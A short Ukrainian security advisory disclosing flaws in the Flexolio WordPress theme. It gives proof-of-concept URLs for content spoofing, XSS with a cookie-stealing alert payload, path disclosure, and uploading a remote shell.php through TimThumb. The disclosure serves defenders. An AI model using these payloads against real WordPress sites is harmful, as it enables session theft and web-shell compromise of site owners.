Численні уразливості в Flexolio для WordPress
23:53 26.04.2014У квітні, 23.04.2014, я виявив Content Spoofing, Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Flexolio для WordPress. Вона містить CU3ER і TimThumb.
Content Spoofing (WASC-12):
http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2/1.xml
1.xml:
Cross-Site Scripting (WASC-08):
http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2/xss.xml
xss.xml:
Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.
Cross-Site Scripting (WASC-08):
http://site/wp-content/themes/flexolio/inc/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg
Full path disclosure (WASC-13):
http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://
А також Abuse of Functionality і DoS в уразливості в TimThumb та Arbitrary File Upload уразливість, що була оприлюднена через 3,5 місяці після оприлюднення мною попередніх дірок. Вони можливі в старих версіях теми, бо в останніх версіях теми в TimThumb заборонений доступ до зовнішніх сайтів.
Arbitrary File Upload (WASC-31):
http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://site.com/shell.php
Full path disclosure (WASC-13):
FPD в php-файлах шаблону (по замовчуванню) або в error_log. В index.php та інших php-файлах.
http://site/wp-content/themes/flexolio/
Уразливі всі версії теми Flexolio.